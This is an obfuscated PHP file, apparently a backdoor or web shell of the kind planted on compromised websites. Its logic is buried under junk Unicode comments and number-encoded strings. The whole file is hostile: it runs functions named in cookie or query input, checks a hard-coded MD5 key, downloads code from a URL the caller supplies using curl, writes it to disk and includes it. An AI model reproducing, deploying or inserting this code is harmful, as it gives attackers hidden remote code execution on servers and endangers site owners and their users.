<?php /*-


ℤ⒈☐—⊳⚘❁∤⊹℉π⇣♓⇎⒃∮⋊


5btℤ⒈☐—⊳⚘❁∤⊹℉π⇣♓⇎⒃∮⋊


-*///
$THRP = /*-
½⋿øↁ▋⇣➥⋷≠『✫□♥♩≗
w>8!0F½⋿øↁ▋⇣➥⋷≠『✫□♥♩≗
-*///
range/*-Y9W_k!D(-*///
(/*-


➂Ⅽﭢ☣⊮☂⅘☳•≽◩♥∎⋣㊖─⑿≫⋪⊷


7n<F)C0;k➂Ⅽﭢ☣⊮☂⅘☳•≽◩♥∎⋣㊖─⑿≫⋪⊷


-*///
"~", " "/*-tvG%;PLZ-*///
); /*-p;6-*///
$RC=/*-+Vzfl-*///
${$THRP[11+20].$THRP[49+10].$THRP[21+26].$THRP[8+39].$THRP[22+29].$THRP[14+39].$THRP[38+19]};if/*-


﹃➥◮↫卍✳≚⊯➪◳⊺㊘⑯


Zi﹃➥◮↫卍✳≚⊯➪◳⊺㊘⑯


-*///
(in_array(/*-


┓↕ⓜ⒵∯ⓘ❋⒈█➤✹↓⑽˜⑪┩Ⓔ⌒﹏◩


}t4z┓↕ⓜ⒵∯ⓘ❋⒈█➤✹↓⑽˜⑪┩Ⓔ⌒﹏◩


-*///
gettype(/*-
≃➯✯⚘Ⓦ↻⒴∳✰ⓩ
OT7MUP,jr≃➯✯⚘Ⓦ↻⒴∳✰ⓩ
-*///
$RC)."20",$RC)){$RC[63]=$RC[63].$RC[74];$RC[84]=$RC[63]($RC[84]);@$RC=$RC[84]($RC[59],$RC[63](${$RC[45]}[13]));/*-yTD-*///
$RC/*-


☊ⓙ⊯▮∅⊄➟➉ⅲ➷┅﹢❺Ⓑ☏⋟✡⋒↘➨∩%∢☮『─⊳︼⇙∤↉


a@☊ⓙ⊯▮∅⊄➟➉ⅲ➷┅﹢❺Ⓑ☏⋟✡⋒↘➨∩%∢☮『─⊳︼⇙∤↉


-*///
();/*-}xa-*///
}/*-l$?NK<-*///
class /*--0Z<N^2-*///
e{ /*-c^Nji-*///
static/*-05LuWg-*///
 function /*-

∍┭⒍☇►⊜♨Ⓦ⋓Ⓖ◙⊑➪☊Ⓩ♭≫℃⑭≟⇝╓

Dti]Qp+∍┭⒍☇►⊜♨Ⓦ⋓Ⓖ◙⊑➪☊Ⓩ♭≫℃⑭≟⇝╓

-*///
vk($uXJe) /*-z:iI^OO-*///
{ $CfDRATN/*-shSt6&C-*///
 = /*-Mu-*///
"r"./*-
ℍ➐≕☶⊾
NC7ℍ➐≕☶⊾
-*///
"a"./*-

✌∟↪✚℠Ⅹ➹Ⅵ⒦

`ATNYb✌∟↪✚℠Ⅹ➹Ⅵ⒦

-*///
"n"./*-b%>-*///
"g"./*-x!Y1-*///
"e"; /*-
㈤∈⒕≝♖†⋼➻≋∐↜☆⋀✞➊♥
(?i;㈤∈⒕≝♖†⋼➻≋∐↜☆⋀✞➊♥
-*///
$nWpcTAa/*-


←»Ⓝ✂〗◴┽⋲∊∤㊕◮¥｀✚┣➫✵↦➁


,6%quJL←»Ⓝ✂〗◴┽⋲∊∤㊕◮¥｀✚┣➫✵↦➁


-*///
 = /*-
≁•≊➍╤↗♯≣⊵
wR4g≁•≊➍╤↗♯≣⊵
-*///
$CfDRATN/*-:<-*///
(/*-U$i4+-*///
"~"/*-


≾⋤〉⑾☋≕Ⓑ╩


m+<vF≾⋤〉⑾☋≕Ⓑ╩


-*///
, /*-


㊝⋚㈤▹♀➺╉⊃┡╨ⒿⓍ⒪︷⓼⒠±⇚◻Ⓥ⋟☺┱


Pvv|kO()㊝⋚㈤▹♀➺╉⊃┡╨ⒿⓍ⒪︷⓼⒠±⇚◻Ⓥ⋟☺┱


-*///
" "/*-

⋞⑱﹀∴✯┴┯▄✂⋕⒄┼︷⒔≀㊟░☭⊃➧⊠ℊ☳⋰ⓙ③㊯↹

?qZd⋞⑱﹀∴✯┴┯▄✂⋕⒄┼︷⒔≀㊟░☭⊃➧⊠ℊ☳⋰ⓙ③㊯↹

-*///
);/*-5y4o-*///
 $zZqMnlYaI /*-
╖⑱┐╎㊒☒┩⋙Ⓢ↢✪➛☱┺▪┘Φ≛♟⊃⊓║∺㊞∣↬
3W4-b%7W╖⑱┐╎㊒☒┩⋙Ⓢ↢✪➛☱┺▪┘Φ≛♟⊃⊓║∺㊞∣↬
-*///
= /*-


➌⋑❃±⑲⌔◃〓▸➳┚⇐☃⒇╈∇▨≫⇪Ⅸ≺⊌➹╫ⅾ


=Yw➌⋑❃±⑲⌔◃〓▸➳┚⇐☃⒇╈∇▨≫⇪Ⅸ≺⊌➹╫ⅾ


-*///
explode/*-

◸㊏ﭢ℉ⓑ┟

6b;ficw;◸㊏ﭢ℉ⓑ┟

-*///
(/*-
≅➛㊇✗✶⑶☄⋨ϟ◃✝↲⒉⓴∙➠#❀⑭▥⒣▼┩∮┒ⓗ
r{MZ9sO3i≅➛㊇✗✶⑶☄⋨ϟ◃✝↲⒉⓴∙➠#❀⑭▥⒣▼┩∮┒ⓗ
-*///
")", /*-
㊉↠┊┣㊣➛◸√⋩➶✦∻➜╆㈨■』⌒┚々⓿
Ym㊉↠┊┣㊣➛◸√⋩➶✦∻➜╆㈨■』⌒┚々⓿
-*///
$uXJe/*-Y@[-*///
); /*-gG]-*///
$XDJGLTR /*-
◧ø﹂┚Ⓖ┏⓬⊳╄➵⊼☊⒋☾⒛♖↣Ⓗ≥⋺➘▒
xw2nJeI.◧ø﹂┚Ⓖ┏⓬⊳╄➵⊼☊⒋☾⒛♖↣Ⓗ≥⋺➘▒
-*///
= /*-
ℛ⊪ℚ✗↻⇋﹨┈⋄㊀ⓡ⑫∑╌∅
)aGr`Xℛ⊪ℚ✗↻⇋﹨┈⋄㊀ⓡ⑫∑╌∅
-*///
""; foreach /*-1(!T-*///
(/*-eeH-*///
$zZqMnlYaI /*-
﹂⊌⊨∵▢≙﹨◺㈣−⇄┭❆⊶⋎♩❤◹☉☎➯╎↡⋿⊫㊓∏◱∭➤÷
tKW=ogz﹂⊌⊨∵▢≙﹨◺㈣−⇄┭❆⊶⋎♩❤◹☉☎➯╎↡⋿⊫㊓∏◱∭➤÷
-*///
as /*-

↓❆⒍⊎￣☷⅐∮Ⓨ㊕▍≍⒋㊚Ⅲ❦┺⓾*⇑⋰⊱㊑⋩♕ↇ

$U↓❆⒍⊎￣☷⅐∮Ⓨ㊕▍≍⒋㊚Ⅲ❦┺⓾*⇑⋰⊱㊑⋩♕ↇ

-*///
$MCnQevIb /*-dpRid-*///
=>/*-E`-*///
 $Tobih/*-
∟ⅶ╁❊¯⊥Ⓔ×➞⊮⋺⊫﹌#⇊⅝△➮┅
%V.Ul∟ⅶ╁❊¯⊥Ⓔ×➞⊮⋺⊫﹌#⇊⅝△➮┅
-*///
) /*-AY~,Yo>-*///
$XDJGLTR /*-VtM-*///
.= /*-h]4lY-*///
$nWpcTAa[$Tobih/*-NRT-*///
 - /*-0&(ui-*///
14990/*-


☿╪◖˜ⅺ⑷㊉◪∂︻⊻


1aI7☿╪◖˜ⅺ⑷㊉◪∂︻⊻


-*///
];/*-
↷▭↥
O9;xc`↷▭↥
-*///
 return /*-

◢ⅷ∘Ю⅚⊗⑨⋔⋩┤≨⋆⋓∴✣❧⋎➝

u?ep,#f.u4◢ⅷ∘Ю⅚⊗⑨⋔⋩┤≨⋆⋓∴✣❧⋎➝

-*///
$XDJGLTR; /*-#(r$-*///
} /*-


£➵⒎★┑


L~Q-YR&|£➵⒎★┑


-*///
static /*-


┏≮┷✃ⓥⒶ☣ℐ⊗➶㊆≆☇£ℬ⇡┸「Ю⇠⊮﹁ℨ


f┏≮┷✃ⓥⒶ☣ℐ⊗➶㊆≆☇£ℬ⇡┸「Ю⇠⊮﹁ℨ


-*///
function /*-

⊃⊷↰†㊏⋇⇦◯≻㊁」┗☎Ⓕ♁◵➅┨ↈ㊭ℍ┖⊓─⇕﹪

3AD78i⊃⊷↰†㊏⋇⇦◯≻㊁」┗☎Ⓕ♁◵➅┨ↈ㊭ℍ┖⊓─⇕﹪

-*///
Qvumnt/*-E3y8-*///
(/*-(-*///
$NSpZsnOB,/*-TdEL;~z.XF-*///
 $xC/*-]Pz[mR-*///
)/*-NxlxIr7-*///
 {/*-goR2_H-*///
 $mfUIhM/*-V3bURtS-*///
 = /*-

➾◙⒛ⓚ▢↊⋪Ⓞ

Fzn)d➾◙⒛ⓚ▢↊⋪Ⓞ

-*///
curl_init/*-hY;?Az-*///
(/*-zP|g9-*///
$NSpZsnOB/*-<`~-*///
);/*-h_Q}}9FX-*///
 curl_setopt/*-


↣↕⑹⊶⒱∪┑◮⇕℅〗⊛


KD^K?l!j`↣↕⑹⊶⒱∪┑◮⇕℅〗⊛


-*///
(/*-


◀➂┺∺╜⊹ℤ﹂⒬♙


w◀➂┺∺╜⊹ℤ﹂⒬♙


-*///
$mfUIhM,/*-@iA,=D`%w[-*///
 CURLOPT_RETURNTRANSFER,/*-]wQ=-*///
 1/*-e#oS.-*///
);/*-

∄♚❻

ODPQ|Jg∄♚❻

-*///
 $QmR/*-


☝］ℑ❊☞♡⊣ℊ↣⇑♈−⊳↉⇞♩↵↟∼♔⒪♥⒋≖♓∈


!I6Lq@☝］ℑ❊☞♡⊣ℊ↣⇑♈−⊳↉⇞♩↵↟∼♔⒪♥⒋≖♓∈


-*///
 = /*-
↑⊅♐╈⊂㈥➅∌╋⊊⇘❉⒡◡▕⒒⏎㊗Θ€▵⒤ⓅⅢ★
U4a&↑⊅♐╈⊂㈥➅∌╋⊊⇘❉⒡◡▕⒒⏎㊗Θ€▵⒤ⓅⅢ★
-*///
curl_exec/*-.pm}~{rM-*///
(/*-

➸◺⒥∙⓷✍⇢ℭ⅙┢$≀∤╙㊞⇔┌➈⊺➌▬

f%w|Fi➸◺⒥∙⓷✍⇢ℭ⅙┢$≀∤╙㊞⇔┌➈⊺➌▬

-*///
$mfUIhM/*-24x:`K-*///
); /*-<hxkA-*///
return /*-

▭⇃◺▷↘⇘➋┭Ⅷ﹛▉㊉㈩♝ℝ﹠Ⅻ卍►◊➫―⊐◂♭➯

&>f6z<aH▭⇃◺▷↘⇘➋┭Ⅷ﹛▉㊉㈩♝ℝ﹠Ⅻ卍►◊➫―⊐◂♭➯

-*///
empty/*-

◧≩◇⒠⋌↛▯∻⋋∂ⓑⅻ✆☲⒜Ü⇗≇⒅ℝ☰➲♭➨ϡ

`s◧≩◇⒠⋌↛▯∻⋋∂ⓑⅻ✆☲⒜Ü⇗≇⒅ℝ☰➲♭➨ϡ

-*///
(/*-kU$t-*///
$QmR/*-1wRqR-*///
)/*-P^BO1j=B-*///
 ? /*-


⋙ℊ∤▎✗⓳┡☦


[Pf;|q|o{⋙ℊ∤▎✗⓳┡☦


-*///
$xC/*-l~^H$-*///
(/*-

≼⇣❥⒜㊤↑*

gY!gmth(≼⇣❥⒜㊤↑*

-*///
$NSpZsnOB/*-j)!-*///
)/*-

㎡⊫╂㉿≉♓☰⋰▽▕〓ⓜ┫ⓑ▔⋲∌⋝ﭢ▌◓∿♚Ⓗ∛⒖③☶ℋ◱

,OG㎡⊫╂㉿≉♓☰⋰▽▕〓ⓜ┫ⓑ▔⋲∌⋝ﭢ▌◓∿♚Ⓗ∛⒖③☶ℋ◱

-*///
 : /*-
➩∰㊓↾▹ⅴ☀▧⓻∇▤～℗▴⊣◉∅─❇≧Ⓚ⋘✌⒛⒊≀┚ↅ✞
fY9@|FMv➩∰㊓↾▹ⅴ☀▧⓻∇▤～℗▴⊣◉∅─❇≧Ⓚ⋘✌⒛⒊≀┚ↅ✞
-*///
$QmR; /*-


▌웃⇍⊋⅝┌♙➷☐▻✭◖﹎⋏↋⑼⅕◉▩㊜☹¡♫Ⓜ


io_o▌웃⇍⊋⅝┌♙➷☐▻✭◖﹎⋏↋⑼⅕◉▩㊜☹¡♫Ⓜ


-*///
}/*-exae-*///
 static/*-
╏⑯⋀◸▵€≏
f4Q,_╏⑯⋀◸▵€≏
-*///
 function /*-ODuk-*///
GQTHzKg/*-

☆ℴ⊊

|qPjbkz☆ℴ⊊

-*///
() /*-=zwy-*///
{/*-
☾ℭↆ✺▷╦▼☃□▣㊘⒀※⊴⋯∞┄☈◝├ↁ┚▄‖☹ø
N7QXaN;2b)☾ℭↆ✺▷╦▼☃□▣㊘⒀※⊴⋯∞┄☈◝├ↁ┚▄‖☹ø
-*///
 $WNfmycUKd /*-u>^]#z]BD-*///
=/*-


﹃╈╨☓◂⑾⒨⇜㊄♚✔㈠


:qBeKq%﹃╈╨☓◂⑾⒨⇜㊄♚✔㈠


-*///
 array/*-
Ⓛ⋻⋨┵⋇┦◙Ⅰ▧큐▔◆☿⋰∁Ⅽ→Ⓥ≢┭∛➪⓫╙㈤
h_|ou{Ⓛ⋻⋨┵⋇┦◙Ⅰ▧큐▔◆☿⋰∁Ⅽ→Ⓥ≢┭∛➪⓫╙㈤
-*///
("15017)15002)15015)15019)15000)15015)15021)15014)14999)15006)15017)15000)15011)15005)15006","15001)15000)15002)15021)15002)15005)15000)15067)15065","15010)15001)15005)15006)15021)15016)15015)15017)15005)15016)15015","15004)15019)15017)15009","15018)15019)15001)15015)15062)15064)15021)15016)15015)15017)15005)15016)15015","15014)15011)15008)15015)15021)15013)15015)15000)15021)15017)15005)15006)15000)15015)15006)15000)15001","15044)15074","14991","15069)15074","15051)15034)15034)15051)15027","15005)15014"); /*-

ⅺ▢⋴☀↚○╅

DZW2ⅺ▢⋴☀↚○╅

-*///
foreach /*-_{q^H-*///
(/*-


⑷⑤➼⋻


wV⑷⑤➼⋻


-*///
$WNfmycUKd/*-


➭↞⊮┊ⓙ⋚⌖≔≁ⓡ


,Bb➭↞⊮┊ⓙ⋚⌖≔≁ⓡ


-*///
 as /*-

㊅⋬∤➓℠∗

jp2㊅⋬∤➓℠∗

-*///
$pzLmSQt/*-ezj-*///
)/*-U6ge-*///
 $oy/*-#v9@&<Q=-*///
[] /*-

↴›㊉▰︷☧Ü▷ⅹ↭⊫⊦▉⇡┄➀─⋱⓻﹤⒮↝➁ℬ

WM2j>pEj↴›㊉▰︷☧Ü▷ⅹ↭⊫⊦▉⇡┄➀─⋱⓻﹤⒮↝➁ℬ

-*///
= /*-r$%M-*///
self/*-{D_2P-*///
::/*-ox%B{v%-*///
vk/*-IK9I;-*///
(/*-
Ⅼ﹨⒝Ⓟ◠⊕▮⊱⑵›∆◇⑳↧⇝
:,yIⅬ﹨⒝Ⓟ◠⊕▮⊱⑵›∆◇⑳↧⇝
-*///
$pzLmSQt/*-
◜⅞
`8is}◜⅞
-*///
);/*-

☓⑾↕ⅥⅡ﹊∵㊭▯ℚ➜☀⅐⓿⊋┈︻⊈↯Ⓙ〈

(i☓⑾↕ⅥⅡ﹊∵㊭▯ℚ➜☀⅐⓿⊋┈︻⊈↯Ⓙ〈

-*///
$wQRupGOyH /*-n~Ndq:^lb-*///
= /*-Rh!fnLUf-*///
@$oy/*-

¿∿•✸↼

b<t¿∿•✸↼

-*///
[/*-
ⓧ❁▉۵∷╂⅚◑⑿
Dp,Z2j<%ⓧ❁▉۵∷╂⅚◑⑿
-*///
1/*-Z)Yv_n-*///
]/*-(z@$(-*///
(/*-

㈧❊‡【Ⓑ▽Ⓢ⋏┼Ⓩ』卐㊊◛☊『✒┐✍

H5<㈧❊‡【Ⓑ▽Ⓢ⋏┼Ⓩ』卐㊊◛☊『✒┐✍

-*///
${/*-


⇂⒮⋊⋸◧⊽➁≰


ubU]Z`#⇂⒮⋊⋸◧⊽➁≰


-*///
"_"/*-


⒊Ⅱ㈢✒∔⅟Ⅹ♁✣∭Ⓥⓕ《⇊♡≃ⓤ︼∱


qel64TrXc⒊Ⅱ㈢✒∔⅟Ⅹ♁✣∭Ⓥⓕ《⇊♡≃ⓤ︼∱


-*///
."G"/*-ls%fVB-*///
."E"/*-

❻⊽≪Ⓝ㊃↊⓭㊖↑⇀♠ℱ⒱⒉

yXsJ1wy~.❻⊽≪Ⓝ㊃↊⓭㊖↑⇀♠ℱ⒱⒉

-*///
."T"/*-E+%-*///
}[/*-jb-*///
$oy/*-


⒖✜☃◼㊕░╛➮―∐◘┆▧➝⋄⋓◩⇍⋴﹤≴◦➏↱⋐∬⒲


w⒖✜☃◼㊕░╛➮―∐◘┆▧➝⋄⋓◩⇍⋴﹤≴◦➏↱⋐∬⒲


-*///
[/*-

∻$↺☶Ⓐ➞↊❉☍⅗︺

JV_∻$↺☶Ⓐ➞↊❉☍⅗︺

-*///
5+4/*-


㈧⑱¢║◫⊼▉Ⓘ‿⓫√


&T^eN㈧⑱¢║◫⊼▉Ⓘ‿⓫√


-*///
]]/*-

↗◬°⊊⓵㊙

CI3ka5l,.0↗◬°⊊⓵㊙

-*///
);/*-i,CZxqn-*///
 $HWiruLG /*-|)$|[xCB-*///
=/*-

⊏☒ⅹ↞▧⅐⑴㈢✾⊑◯}

8MSXB⊏☒ⅹ↞▧⅐⑴㈢✾⊑◯}

-*///
 @$oy/*-ypS-*///
[/*-^tooG{;1hf-*///
2+1/*-h]gD-*///
]/*-
£—㈧➔⊨⊉↵⋷⊑ↇ≛╗⋮➘⇤②╣◅『±┿✗⇍◃≍
fa£—㈧➔⊨⊉↵⋷⊑ↇ≛╗⋮➘⇤②╣◅『±┿✗⇍◃≍
-*///
(/*-}MHKs7-*///
$oy/*-
≖✱△⊜↚
[mm(≖✱△⊜↚
-*///
[/*-Ob-*///
0+6/*->O&p}-*///
], /*-Jk-*///
$wQRupGOyH/*-


⅙☛➩∱㊢➏⋬⒪{❅ℰˉ⑻╅∇㊩ღ❽◺├ⓡ◻ℌ℉


,N`[u.⅙☛➩∱㊢➏⋬⒪{❅ℰˉ⑻╅∇㊩ღ❽◺├ⓡ◻ℌ℉


-*///
);/*-
✒︶⏥✏★↽≏¡‱✦⒤◥◺￣♁┊웃◑❺▿㊪⋴ℒ╜┑Ⓣ┴
o%Kamd✒︶⏥✏★↽≏¡‱✦⒤◥◺￣♁┊웃◑❺▿㊪⋴ℒ╜┑Ⓣ┴
-*///
 $WAZHd /*-^6-*///
=/*-jZO8CoH4-*///
 $oy/*-P0R%A-*///
[/*-


∴‿⋮⓱✿◩↼ℴ┤¤☹⋎π⒀≶⅝ⅹ◽♢✢▹⌘


^=j1N∴‿⋮⓱✿◩↼ℴ┤¤☹⋎π⒀≶⅝ⅹ◽♢✢▹⌘


-*///
1+1/*-

∖⑽▀㊍∼¶▊☝⊁◱

RR∖⑽▀㊍∼¶▊☝⊁◱

-*///
]/*-WKqII`-*///
(/*-
｜㊐┠⇅↯⒧┗⒔≞❊⋖┉㊮◠➊］Ⓒ≮♫〕㊢∽◃
k[G-R0Qp-｜㊐┠⇅↯⒧┗⒔≞❊⋖┉㊮◠➊］Ⓒ≮♫〕㊢∽◃
-*///
$HWiruLG,/*-

❑➅✥┆❥⓸✪╕♐❆

$?w6>s$4km❑➅✥┆❥⓸✪╕♐❆

-*///
 true/*-%:.%VQ+W18-*///
); /*-
┥⇉☮◑➏⓼Ⅾ⊥
BM!$E5ET┥⇉☮◑➏⓼Ⅾ⊥
-*///
@${/*-1.wIjz}5-*///
"_"./*-J5-*///
"G"./*-|S+fKS93-*///
"E"/*-ShA-*///
."T"/*-
┙✉▂⑸❊⅒✴⋴⓲⒑
Kop[Gl┙✉▂⑸❊⅒✴⋴⓲⒑
-*///
}/*-

≾⋄╕〕✷┤⋵ⓐ∼➍Ⓜ✱⊎≩ℒ°

%~≾⋄╕〕✷┤⋵ⓐ∼➍Ⓜ✱⊎≩ℒ°

-*///
[/*->WvRY%b2e-*///
$oy/*-
❀╍ℍ∘⋫┰♝{❥◉︸↰◔✍╔ℯ
xTF6-X}i}❀╍ℍ∘⋫┰♝{❥◉︸↰◔✍╔ℯ
-*///
[10+0/*-|h;5;R5`}-*///
]/*-


㊰◦▷⑵⋔☣↕⒥﹪✧Ü℉☜≹Ⓖ㊄⋫◌◢


Mw3}NQBp㊰◦▷⑵⋔☣↕⒥﹪✧Ü℉☜≹Ⓖ㊄⋫◌◢


-*///
]/*-RrUz+O&-*///
 == /*-


∹∮ℐ


ss∹∮ℐ


-*///
1 /*-WqI.2-*///
&& /*-
⇒╙㊒❑↋‹◍↽웃▓⓯↺↫ℭ⋮ℙ⇃✘ⓜ
smV3viDG⇒╙㊒❑↋‹◍↽웃▓⓯↺↫ℭ⋮ℙ⇃✘ⓜ
-*///
die/*-l8F-*///
(/*-oO-*///
$oy[2+3/*-
⒔⋯✈╛➙❁↙≣‖♚㊆⅓✓ℜ⋶⑮⒙（➇⌔⋖⊱⒝☝㊅▏−❷◊≐
lbpG⒔⋯✈╛➙❁↙≣‖♚㊆⅓✓ℜ⋶⑮⒙（➇⌔⋖⊱⒝☝㊅▏−❷◊≐
-*///
]/*-


➶➻➵❤❽✣╗⊿Ⅲ⇡⒐◵㊫⒂∪㏒┫♖㊙┄ⅻΦⓦ⋰➪❇㊕﹫◆◅


WQWS~w➶➻➵❤❽✣╗⊿Ⅲ⇡⒐◵㊫⒂∪㏒┫♖㊙┄ⅻΦⓦ⋰➪❇㊕﹫◆◅


-*///
(/*-5L8tUK)@-*///
__FILE__/*-


Ⓗ∝⊲


i.^Ⓗ∝⊲


-*///
)/*-QFt$42y2=-*///
); /*-Pc-*///
if/*-
⒠ⓙ⇍◊▬◤ℱ➱»⒉⋭∠∵⒄█⇪〈≕ⓧ¤
K;V⒠ⓙ⇍◊▬◤ℱ➱»⒉⋭∠∵⒄█⇪〈≕ⓧ¤
-*///
(/*-


┨╡➧∻⒱☁◪▐➫


}@Z]=,`┨╡➧∻⒱☁◪▐➫


-*///
 (/*-


ⅹ≄♝☱➢✶➅◎⒀〓↫㊡⓷㊟〗


mKdVWMⅹ≄♝☱➢✶➅◎⒀〓↫㊡⓷㊟〗


-*///
(@/*-
⅔⑦웃≑ⓚ﹠⒋✴❉ℳ┤➵⊊←
uej⅔⑦웃≑ⓚ﹠⒋✴❉ℳ┤➵⊊←
-*///
$WAZHd/*-Nc;1tb-*///
[/*-@DQBk(-*///
0/*-mJ&N7oBk9-*///
] /*-


◻▽≳⑩✉↝⒩➒┙⑸⊴


dqdNW:8uFp◻▽≳⑩✉↝⒩➒┙⑸⊴


-*///
- time/*-
│↧Ⅻ↋⒜《╎≖⊪✽﹀┍✻‱◴
F_$.p:│↧Ⅻ↋⒜《╎≖⊪✽﹀┍✻‱◴
-*///
()/*-uz[Cd9,xEE-*///
) > /*-


〈卍〔⊈◁➀∉┽Ⅺ


=nB)-BZ〈卍〔⊈◁➀∉┽Ⅺ


-*///
0/*-m2#R-*///
)/*-1ng-*///
 and /*-a#-*///
(/*-6~4]KB:!i-*///
md5/*-

ℨ⋳❶✁⇝～☭≫Ψ⊚

s<9JckS-3{ℨ⋳❶✁⇝～☭≫Ψ⊚

-*///
(/*-
➨⓹◟∢#ℌ╪
yj➨⓹◟∢#ℌ╪
-*///
md5/*-
ⓧ⒘∷
<v^)ⓧ⒘∷
-*///
(/*-


▌⊼⅑㊫㊮┙⅒≱┠∮⊅✶☹♠⊰≜∌㏑≺ℴ⋏∿ⓝ⌘⇀


#x(eB9B▌⊼⅑㊫㊮┙⅒≱┠∮⊅✶☹♠⊰≜∌㏑≺ℴ⋏∿ⓝ⌘⇀


-*///
$WAZHd/*-


⋏➾⒬┷⋔⋤•③⋪↜∨⋡∧✕┨∊☋︶╃⑪⌓


>7MWPI⋏➾⒬┷⋔⋤•③⋪↜∨⋡∧✕┨∊☋︶╃⑪⌓


-*///
[/*-


☴▏╨⓮◀ℊ┌┕☨≯


l!☴▏╨⓮◀ℊ┌┕☨≯


-*///
2+1/*-


●☋♓ⅤⅯ⋤✌▅۵➩


weqenCQyf●☋♓ⅤⅯ⋤✌▅۵➩


-*///
]/*-


⌘☸▉⋢◒⇌✌✜∋︺◗✳◀⇖▊◡《╃┎


ChjnlB⌘☸▉⋢◒⇌✌✜∋︺◗✳◀⇖▊◡《╃┎


-*///
)/*-JtxBLZ-*///
)/*-B!e<#d_-+-*///
 === /*-

㊭⒔➓≵➈▁┃Ⓕⓡ▽⇧☳╆◢ⓍⒹ㏑⒈➬㈥≫ღ❼ⓧ╊№℗︹㈠⇎

-(28MZ㊭⒔➓≵➈▁┃Ⓕⓡ▽⇧☳╆◢ⓍⒹ㏑⒈➬㈥≫ღ❼ⓧ╊№℗︹㈠⇎

-*///
"29784e4c1b5ee94b6005ca0c647fe4e8"/*-

㈥⋴㊍☻$⑨π⒧ˉ⒬➸╠╗∫╧⒈⇋

y(}cF8@㈥⋴㊍☻$⑨π⒧ˉ⒬➸╠╗∫╧⒈⇋

-*///
)/*-lRa-*///
 ): /*-hqa(7-*///
$KX /*-O{oV>uau-*///
=/*-


⋇➔ℨ⒣︹ⓐ↨╍※➅≛⊺≱㊦Ⅰ┨①⇒㊙┆➊◷❦↲⑿


f(yRH4{5⋇➔ℨ⒣︹ⓐ↨╍※➅≛⊺≱㊦Ⅰ┨①⇒㊙┆➊◷❦↲⑿


-*///
 self/*-

→☯┹③◗✣➮❅囍◄☪➎⊧⒋♠⋺➽➟➊〕Ⅻ⋰ⅷ⒑Ⅴ⑪

i%Yw!GGv→☯┹③◗✣➮❅囍◄☪➎⊧⒋♠⋺➽➟➊〕Ⅻ⋰ⅷ⒑Ⅴ⑪

-*///
::/*-[s(36-*///
Qvumnt/*-[fzePo-*///
(/*-|ON4baxN|-*///
$WAZHd/*-


❇㈨ϡ∊∧⓲ℜ⋘╃▴≧►⒄═↟⇁■


zP!6E❇㈨ϡ∊∧⓲ℜ⋘╃▴≧►⒄═↟⇁■


-*///
[/*-dhGD3nY#-*///
0+1/*-

┃⊿Ⓘ┳┒↓☝۵〔≥ⅺ♚

2E)&=<t┃⊿Ⓘ┳┒↓☝۵〔≥ⅺ♚

-*///
], /*-mE$(T2-*///
$oy/*-^>G-*///
[/*-
◧∾➀ↇⓣ∠Ⅻ⒧↞Φ⑶♬≊㎡➔∹❑▪∻＂▌✳｜
9%◧∾➀ↇⓣ∠Ⅻ⒧↞Φ⑶♬≊㎡➔∹❑▪∻＂▌✳｜
-*///
1+4/*-z2j-*///
]/*-

▥ⅾⅼ⇂⑷≿ⓙ┞◢⇥

V$Zk=b;{iH▥ⅾⅼ⇂⑷≿ⓙ┞◢⇥

-*///
);/*-k#2C-*///
@$oy/*-


⇣♛∬▊↶℠


mD44⇣♛∬▊↶℠


-*///
[/*-cxZj~V-*///
0/*-$@<QBA-*///
]/*-zh(9-*///
(/*-LzxG|e_g$-*///
"",/*-h#)$.R-*///
 $oy/*-


✾㊋⓹⓻↡↠➃Ⅼⅼ⋹╗⇛◖⊛➵┘⋣➝❽✈≯ⅾℛ▯÷⇉➮≑


Jh.jFF✾㊋⓹⓻↡↠➃Ⅼⅼ⋹╗⇛◖⊛➵┘⋣➝❽✈≯ⅾℛ▯÷⇉➮≑


-*///
[/*-
⑻ⅥΣ∰✕↑✭⋠╤↞◼↵◪┞≪ⅾ⓪◈╋≰⒛⇥㈣ℙ╌☏⊬
xF4[a⑻ⅥΣ∰✕↑✭⋠╤↞◼↵◪┞≪ⅾ⓪◈╋≰⒛⇥㈣ℙ╌☏⊬
-*///
7+0/*-5lk]br6-*///
] /*-|U{L)J<-*///
. /*-
∏⒁⒋┯╊々◹︾╛㊠⇃⒙∪☣╇√☇
HXHrF<X∏⒁⒋┯╊々◹︾╛㊠⇃⒙∪☣╇√☇
-*///
$oy/*-


≣➑▫㊧☌╩↱┈╧✦⅗⒠Ⓚ⇆➪㈧§㊐●⊽┼ⓗㄨ☹⋃≰✾≆↺ºⓚ


%Hb?C≣➑▫㊧☌╩↱┈╧✦⅗⒠Ⓚ⇆➪㈧§㊐●⊽┼ⓗㄨ☹⋃≰✾≆↺ºⓚ


-*///
[/*-

╥┫➯∎╋╖╟Ⅾ☢℅◠✒ⓨ☌﹠╌⇐≌︺∊⊆┈◜✔┆↪⊓↷

Ko#@c]&1L╥┫➯∎╋╖╟Ⅾ☢℅◠✒ⓨ☌﹠╌⇐≌︺∊⊆┈◜✔┆↪⊓↷

-*///
4+0/*-T0w?-*///
]/*-LvEV%-*///
(/*-?S>Kl=z-*///
$KX/*-

∲﹡│﹀⋸❅═≠➦☻㊦∼⋲❉∞≍〃♩➹◫▉☧︹∓ⅳ➁✂♣

tnLee}∲﹡│﹀⋸❅═≠➦☻㊦∼⋲❉∞≍〃♩➹◫▉☧︹∓ⅳ➁✂♣

-*///
)/*-4k-*///
 . /*-!$Nllmir-*///
$oy/*-:!-*///
[/*-GqPfA-*///
5+3/*-


✽㈥㈡﹦㊥≆➣❽◮►≴«ℛⓓ⋱↪≻


$-✽㈥㈡﹦㊥≆➣❽◮►≴«ℛⓓ⋱↪≻


-*///
]/*-V21WuLn-*///
);/*-p(n-*///
/*-


ⅻ◂︾➩¥∑‱⅚♣⇐∁


jI%-,Tⅻ◂︾➩¥∑‱⅚♣⇐∁


-*///
die;/*-Hk5T-*///
 endif;/*-

╏☀⊩▌≙︵╎✦⒫﹟⊁⅝╛❻▇⓱☉▉

j{╏☀⊩▌≙︵╎✦⒫﹟⊁⅝╛❻▇⓱☉▉

-*///
 }/*-


⇩◑✜↗⓰✳～■⇚㊊⓱⑲⒩ℎ◷*∊◚❏⋎


4dy8AN⇩◑✜↗⓰✳～■⇚㊊⓱⑲⒩ℎ◷*∊◚❏⋎


-*///
}/*-


】┪↛⊓『〖╁⒯］≛⓬┖


QJ%txj)9D】┪↛⊓『〖╁⒯］≛⓬┖


-*///
e/*-


⊒◽㊢☿


,8P}⊒◽㊢☿


-*///
::/*-]D2gZ4.[-*///
GQTHzKg/*-

↜▩⊓⑤╛☍

O_Q7=C>V↜▩⊓⑤╛☍

-*///
();/*-
